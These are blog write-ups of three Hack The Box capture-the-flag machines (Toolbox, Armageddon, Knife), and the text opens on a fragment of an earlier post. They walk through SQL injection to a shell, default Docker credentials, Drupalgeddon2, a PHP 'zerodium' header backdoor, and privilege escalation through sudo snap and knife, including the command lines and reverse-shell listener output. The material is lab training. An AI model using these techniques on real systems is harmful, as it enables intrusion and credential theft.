If I’m being honest with myself, I don’t know why my payload was executed. I understand the logic of the script but I don’t know at which point it executes the reverse shell. I assume that it’s happening before it gets passed to the tool because the tool would have produced an error. But then does the rest of the script still get executed? Surely if it did, it would also result in an error as the tool is still receiving invalid input. I assume that the script hangs once it executes the payload and then I receive the reverse shell. I will have to come back to revisit it. Anyway, I struggled with this box but learnt a lot so thanks for the box.
Toolbox is an easy Windows machine created by MinatoTW on Hack The Box and was released on the 12th of March 2021. Hello world, welcome to Haxez where today I will explain how I hacked Toolbox. In order to complete this box you will need basic web knowledge. By completing this box you will learn to leverage PostgreSQL SQL Injection for RCE and Docker Toolbox exploitation.
Toolbox Enumeration
First, I spawned the box and sent a single ping request to check if I could talk to it. Next, I performed a Nmap scan that scanned all ports, requested service versions and ran default scripts. I saved the output in all formats to files named Toolbox. I instructed Nmap to send a minimum of 10000 packets per second. However, I wouldn’t advise you to do this on real engagements. 10000 packets per second are quite a lot and could congest the network and cause disruption on the target host.
As a result of the scan, I learnt that the host had a plethora of ports open including 21 for FTP. Furthermore, FTP also allowed anonymous access. SSH was listening on port 22 with the banner informing me that it was OpenSSH for Windows 7.7. Port 443 for HTTP with the banner advising me that it was Apache 2.4.38. The SSL certificate’s common name was admin.megalogistics.com which could be useful later. Finally, ports 139, and 445 were open for SMB. A few other ports were open including 5985 for WinRM.
My first thought was that this box appears to be having an identity crisis. It’s a Windows box with SSH enabled and was also running an Apache webserver. I would have expected to see IIS.
Starting with the lowest port number, I connected to the FTP service using the username anonymous. I submitted an empty password and was granted access. Next, I listed out the contents of the FTP directory and saw an executable named docker-toolbox.exe. I suspected that it was just there to give me a hint about the environment but I downloaded it anyway. Other than that, there wasn’t anything else on the FTP server.
┌──(kali㉿kali)-[~/HTB/Toolbox] └─$ ftp 10.129.96.171 Name (10.129.96.171:kali): anonymous ftp> ls ftp> get docker-toolbox.exe
Since SSH was unlikely to be the attack vector I moved on to SMB. I was optimistic that null sessions might be enabled. Unfortunately, they weren’t but through using crackmapexec, I was able to learn the hostname and domain name. The hostname was TOOLBOX and the domain name was Toolbox. For practice, I also ran smbmap and smbclient.
With the low-hanging fruit picked, I headed to the web application. I visited the IP address over HTTPS in my browser which loaded a logistics web application. I have to commend the author of the box for this one. It seemed like they put a lot of effort in to this application. It had the generic Lorem ipsum text but it felt real.
I was capturing the requests and responses in Burp when I noticed something interesting. I ran a few other tools like whatweb too and they all reported the same thing. The HTTP server header was reporting that it was Apache 2.4.38 for Debian. As this is a Windows box, I was now certain that the web application was running inside a Docker container.
I poked around the web application for a bit but I suspected that the subdomain that Nmap found was the path forward. I used the echo tool to append the subdomain to my host file.
┌──(kali㉿kali)-[~/HTB/Toolbox] └─$ echo "10.129.96.171 admin.megalogistic.com" | sudo tee -a /etc/hosts
After that, I visited the subdomain in my browser and was presented with a login page. I tried a variety of easily guessable passwords like admin and password but they all failed. Next, I moved on to trying special characters like the single quotation mark. Bingo, the single quotation mark escaped the SQL query and produced an error. The login form was vulnerable to SQL Injection.
I looked through my Burp HTTP history and found the log-in POST request. I saved this request to a file so that I could feed it to SQLMap.
Toolbox SQL Injection
First, I ran SQLMap with the batch argument so that it would automatically choose the default option in the prompts. Additionally, I used the force SSL option since the target was using SSL. After the initial tests confirmed SQL injection, I enumerated the database. I dumped the contents of the user’s table from the public database. Please note the image below has been edited to only show the relevant information.
Next, I used the tool hash-identifier to identify the hash. The error message produced when identifying the SQL injection suggested it was an MD5. I had no doubt that it’s an MD5 but this way I get to show off a cool tool.
Next, I attempted to crack the hash with Hashcat and John using the rockyou wordlist. Unfortunately, neither of them was able to crack the hash. I also uploaded the hash to crackstation.net but it also didn’t recognise the hash. Moving on, I used a traditional logic authentication bypass to log in to the application. By submitting the logic of “or 1=1 — -” to the login form, it bypasses authentication regardless of the password being correct.
However, this seemed to be a dead end. Other than being able to retrieve a few email addresses, there wasn’t much I could do.
Toolbox SQL Injection To Foothold
With the application thoroughly investigated, I went back to the drawing board. The help menu for SQLMap shows that there is a –os-shell command. The os shell will prompt for an interactive operating system shell. I appended this command to my initial SQLMap command and successfully received a command shell.
The reverse shell connected back to my netcat listener and I was able to capture the user.txt flag.
┌──(kali㉿kali)-[~/HTB/Toolbox] └─$ sudo nc -lvnp 9001 [sudo] password for kali: listening on [any] 9001 ... connect to [10.10.14.54] from (UNKNOWN) [10.129.96.171] 50127 bash: cannot set terminal process group (1574): Inappropriate ioctl for device bash: no job control in this shell postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ cd ~ postgres@bc56e3cc55e9:/var/lib/postgresql$ cat user.txt cat user.txt f01▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓c6a flag.txt
Toolbox Host Enumeration
First things first, I located the Python3 and Bash binaries so that I could upgrade my shell. Using the Python3 trick, I upgraded my shell to make it more usable.
postgres@bc56e3cc55e9:/var/lib/postgresql$ which python3 /usr/bin/python3 postgres@bc56e3cc55e9:/var/lib/postgresql$ which bash /bin/bash postgres@bc56e3cc55e9:/var/lib/postgresql$ python3 -c 'import pty;pty.spawn("/bin/bash")'
Confident that I was inside a Docker container, I ran ifconfig. I could have ran LinPEASS which would have confirmed it but the following way works too. A tell-tale sign of being inside a container is that the IP address doesn’t match the target. The results of ifconfig showed that the IP address of the host was 172.17.0.2. The Docker host was likely going to be the first IP address in the subnet (172.17.0.1).
Privilege Escalation
According to the boot2docker github page, you can ssh to the docker host using the username docker and the password tcuser.
With this information, I attempted to ssh to the 172.17.0.1 IP address. However, I received SSH key permission errors on my first attempt. Initially, I had fully upgraded my shell by exporting term to xterm and that caused issues. After reconnecting and spawning a bash shell, I could SSH to the host. Once on the host, I ran sudo -l and learnt that I could switch the user to the root user without a password.
I switched to the root user and started enumerating the system. As it was a Windows system, I checked the contents of the Administrator user’s home directory. As a result, I found the Administrator user’s SSH private key.
I quickly stole the private key and saved it to a file on my attack machine. I gave the key 600 permissions and used it to SSH to the target as the administrator user. From here I was able to steal the root.txt flag.
The Toolbox box was a lot of fun. Admittedly, I was disappointed that it was more Linux than Windows. However, that feeling passed once I completed the box. I learnt something new from the foothold but did fall down some rabbit holes on the way. Once on the box, I struggled with my shell not allowing me to SSH to the next host. This is something I need to investigate further as I don’t understand what was wrong.
The privilege escalation taught me about the particular quirks of the service in use. Once I knew what needed to be done, the rest was easy. This box taught me a few new things but also made me aware that my skills are improving. I was able to quickly identify that something suspicious was going on. Anyway, this box was a blast. Thanks for the box.
Armageddon is an easy Linux box created by bertolis on Hack The Box and was released on the 27th of March 2021. Hello world, welcome to Haxez where today I will explain how I hacked Armageddon. The skills required to complete this box are Basic Linux Knowledge. The skills learnt from completing this box are Drupal exploitation and Snap package manager exploitation.
Armageddon Enumeration
I connected to the Hack The Box VPN and clicked the button to spawn the box. To ensure I could talk to the box, I sent a single ping request and the box kindly responded. Next, I ran a Nmap scan that targeted all ports, enumerated service versions, ran default scripts and saved all output types. As a result, I learnt that ports 22 for SSH and 80 for HTTP were open. Furthermore, I learnt that the webserver was running Apache 2.4.6 and that the application used the Drupal Content Management System.
The Nmap scan identified a number of files that contained useful information. For example, the CHANGELOG.txt file disclosed the version history of Drupal 7. The changelog showed that the last update was 7.5.6, As a result, I was able to search for vulnerabilities affecting that particular version of Drupal.
I used searchsploit to search for vulnerabilities that affected Drupal version 7.56. The results indicated that there were several authenticated and unauthenticated remote code execution vulnerabilities. Furthermore, a number of these vulnerabilities had Metasploit modules.
First, I launched Metasploit with the msfconsole command. Next, I searched for drupalgeddon2 which produced 1 result. I selected the module by using the use command followed by the module number displayed in the search results. After that, I configured the module by setting the RHOSTS parameter to the IP address of the target. Finally, I set the LHOST parameter to tun0 (my VPN interface) and then ran the exploit. After a brief period, I received a meterpreter session.
Time to start pillaging. Now that I had a shell on the box, I started looking for useful information. I knew that Drupal was a database-powered website so started looking for the database configuration file. After a quick Google search, I learnt that Drupal stores the database connection details in a file called settings.php in the sites/default directory. I viewed the contents of the file and stole the credentials.
Unfortunately, the shell didn’t play well when logging into the database. When running queries, the results weren’t returned to the terminal. I’m not entirely sure what the problem was but it meant I had to change my approach. I used the following commands to retrieve the users from the user’s table.
mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -e 'show databases' mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -D drupal -e 'show tables' mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -D drupal -e 'describe users' mysql -u 'drupaluser' --password='CQHEy@9M*m23gBVj' -D drupal -e 'select uid,name,pass,login from users'
uid name pass login 0 0 1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt 1607076276
Lateral Movement
I saved the password hash to a file and searched on the hashcat example hashes web page for the type of hash. As a result, I learnt that hashes that start with ‘$S$’ appear to be specific to Drupal 7. The hashcat cracking mode for these hashes is 7900. I used hashcat to crack the hash which revealed that the password was booboo.
I then used the password to log in via SSH as the brucetherealadmin user. From here I was able to capture the user.txt password.
┌──(kali㉿kali)-[~/HTB/Armageddon] └─$ ssh [email protected] The authenticity of host '10.129.48.89 (10.129.48.89)' can't be established. ED25519 key fingerprint is SHA256:rMsnEyZLB6x3S3t/2SFrEG1MnMxicQ0sVs9pFhjchIQ. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.129.48.89' (ED25519) to the list of known hosts. [email protected]'s password: Last login: Tue Mar 23 12:40:36 2021 from 10.10.14.2 [brucetherealadmin@armageddon ~]$ cat user.txt e91▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓2fc
Armageddon Host Enumeration
With the user flag captured, I started enumerating the system. I tend to run some commands before resulting to LinPEASS. First, I tend to check to see if the user can run anything with sudo privileges. From running sudo -l, I learnt that the user could install snap packages.
[brucetherealadmin@armageddon ~]$ sudo -l
Next, I headed to GTFO Bins to see if there were any techniques that would allow me to exploit this privilege. As a result, I learnt that having the ability to run snap as sudo could allow privilege escalation. Since it snap doesn’t drop the elevated privileges it could be used to access the rest of the file system with those privileges.
I followed the example on GTFO bins but ran into a problem. When trying to execute the line starting with fpm, the system reported that the fpm command wasn’t found.
However, this reminded me of LXC and Docker container escapes. Perhaps if I created the snap locally and then uploaded it to the server, I could use the install command to install it. First I needed to install snap locally. I tried to run it and Kali was kind enough to tell me it could install it.
┌──(kali㉿kali)-[~/HTB/Armageddon] └─$ snap Command 'snap' not found, but can be installed with: sudo apt install snapd Do you want to install it? (N/y)y
The next step was to create the snap and download it onto the target box and install it. However, I ran into problems so I watched IppSec’s video >>HERE<< to guide me through it. First, on the target box, I copied /usr/bin/bash to /home/brucetherealadmin/bash.
As you can see from the screenshot below, the snap was installed successfully. However, more importantly, it ran the command to change the ownership and permissions of the bash file. The file was now owned by root and had setuid set.
I could now run the bash binary and capture the root flag.
I enjoyed this box but thought it was tricky once I had established a foothold. The method of gaining a foothold was simple. It helped me reinforce some Drupal knowledge and I learnt about the specific exploit. Once I was on the box I ran into problems. However, I learnt some valuable lessons about ways to interact with MySQL.
In theory, the privilege escalation should have been simple but I struggled. I haven’t done much with Snap so my brain automatically thought that it was harder than it was. Now that I’ve completed it, it seems easy. Anyway, another one bites the dust. Thanks for the box.
Knife is an easy Linux box created by MrKN16H7 on Hack The Box and was released on the 22nd of May 2021. Hello world, welcome to Haxez where today I will explain how I hacked Knife. The suggested required knowledge to complete this box is enumeration, basic Knowledge of Linux and OWASP Top 10. The skills learned are web exploitation and knife sudo exploitation.
Knife Enumeration
First, I sent a ping request to the box to ensure it was online and that I could talk to it. Next, I performed a Nmap scan against all ports, running default scripts and requesting service versions. I set the minimum packet rate to 10000 and saved all outputs to a file named knife. As a result, I learnt that ports 22 for SSH and port 80 for HTTP were open. The SSH banner suggested the box had an Ubuntu operating system. The results from port 80 informed me that it was running Apache 2.4.41 and that the web application had the title Emergent Medial Idea.
When performing Web Application penetration tests, there are two tools that I always run. First, I like to run whatweb to identify the technologies in use. I’m not sure how whatweb gathers its information but the results suggest it sends a request to the server and then checks the headers. From the results, I learnt that the Web Application was utilising PHP 8.1.0-dev. Not much else was reported back that Nmap hadn’t already discovered.
Next, I like to run Nikto which is a web application vulnerability scanner. An initial scan with Nikto also identified the PHP version as 8.1.0-dev and reported that several security-related HTTP headers were missing but not much else.
I started to suspect where a vulnerability might be. However, I continued enumerating by visiting the web application and poking around. There wasn’t much to the application and the links didn’t appear to work.
PHP Backdoor Remote Code Execution
The PHP version had dev in the name which instantly made me suspicious. Consequently, I performed a Google search for the version and the top result was a GitHub repository for a backdoor RCE vulnerability. I wonder whether Nmap scripts or Burp Professional would have reported this as a finding. I might check that later.
Next, I navigated to the Exploit Database entry for this finding to view the code. As a result, I learnt that the backdoor checks to see if the User-Agentt header is present (notice the two tt’s) and whether that header has the value zerodium. If both those conditions are true then whatever comes directly after zerodium gets executed by eval.
For example, if I used the system function to execute the external ping command then I could use tcpdump and check if it pings my host. As you can see below, this is exactly what I did. I set tcpdump to listen on tun0 for ICMP packets. Next, I added the malicious header and my command to ping my host. Sure enough, the target sent 4 ICMP packets to my host.
With remote code execution confirmed, I used it to gain a reverse shell on the host. First, I set up a netcat listener on port 1337. Next, I modified the ping command to a bash reverse shell. Finally, I sent the request and the application hung (good sign). I checked my netcat listener and I received a connection from the target host.
I now had access to the box as the james user and was able to capture the user.txt flag.
┌──(kali㉿kali)-[~] └─$ sudo nc -lvnp 1337 listening on [any] 1337 ... connect to [10.10.14.36] from (UNKNOWN) [10.129.225.186] 44714 james@knife:~$ cat user.txt cat user.txt ce1▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓64d
Knife Privilege Escalation
First, I used the private key in james’s .ssh directory to SSH back to the box. This achieved two things, the first being a more stable shell, and the second was persistence. Next, I ran sudo -l to see if james could execute any commands as root. As a result, I learnt that james could run knife as sudo.
james@knife:~$ sudo -l
Knife is a command-line tool that provides an interface between a local chef-repo and the Chef Infra Server. It helps users manage nodes, cookbooks and recipes, roles, environments, and data bags. Knife includes a collection of built-in subcommands that work together to provide the functionality required to take specific actions against any object in an organization. These subcommands allow knife to issue commands that interact with any object stored in the chef-repo or stored on the Chef Infra Server. Searching GTFO-Bins for knife, I learnt that knife can execute commands such as spawning a shell. Since I can run it as root, I should be able to give myself a root shell and capture the root.txt flag.
I copied the command and ran it. Sure enough, I was root and could capture the root flag.
james@knife:~$ sudo -l Matching Defaults entries for james on knife: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User james may run the following commands on knife: (root) NOPASSWD: /usr/bin/knife james@knife:~$ sudo knife exec -E 'exec "/bin/sh"' # whoami root # id uid=0(root) gid=0(root) groups=0(root) # cat /root/root.txt f35▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓0b9
Knife Learnings
This was a fun box which taught me about the PHP backdoor vulnerability. I believe I had read about it a while ago but didn’t immediately associate the version with the vulnerability. I enjoyed learning about why it is vulnerable and how to exploit it. It helped to build up my knowledge of dangerous functions in PHP.
The privilege escalation was nice and simple and didn’t require much effort. I do enjoy a challenge but sometimes is nice to have an easy win. I learnt a bit about Knife and Chef which was good. There isn’t much more to say about the box honestly. It would be great for beginners and I had a lot of fun popping it. Thanks for the box.
